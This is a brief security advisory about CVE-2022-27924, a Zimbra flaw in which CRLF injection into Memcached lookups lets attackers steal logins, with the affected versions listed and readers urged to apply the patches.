Technical details have emerged on a highly severe vulnerability affecting certain versions of the Zimbra email server provider. Hackers might have exploited this bug to steal logins without authentication or any user interaction.
The security issue is tracked as CVE-2022-27924 and impacts Zimbra releases 8.8.x and 9.x for both open-source and the commercial versions of the platform.
A hot fix has been published by Zimbra in versions ZCS 9.0.0 Patch 24.1 and ZCS 8.8.15 Patch 31.1. It became available since May 10, 2022. Zimbra software is used by various organisations worldwide, including officials, financial, industrial and educational sectors.
The flaw has been described in a report from researchers at SonarSource, who summarized it as “Memcached poisoning with an unauthenticated request.” Exploitation is possible via a CRLF injection into the username of Memcached lookups.
Memcached is an internal-service instance that stores key/value pairs for email accounts to improve Zimbra’s performance by reducing the number of HTTP requests to the Lookup Service. Memcache sets and retrieves those pairs using a simple text-based protocol.
SonarSource has shared YouTube video to demonstrate exploit of the vulnerability.
Researchers explain, that when the Mail client restarts or needs to re-connect, which can happen periodically, it will re-authenticate itself to the targeted Zimbra instance.
Kaduu Team urges you to update Zimbra version shall you use this mail client.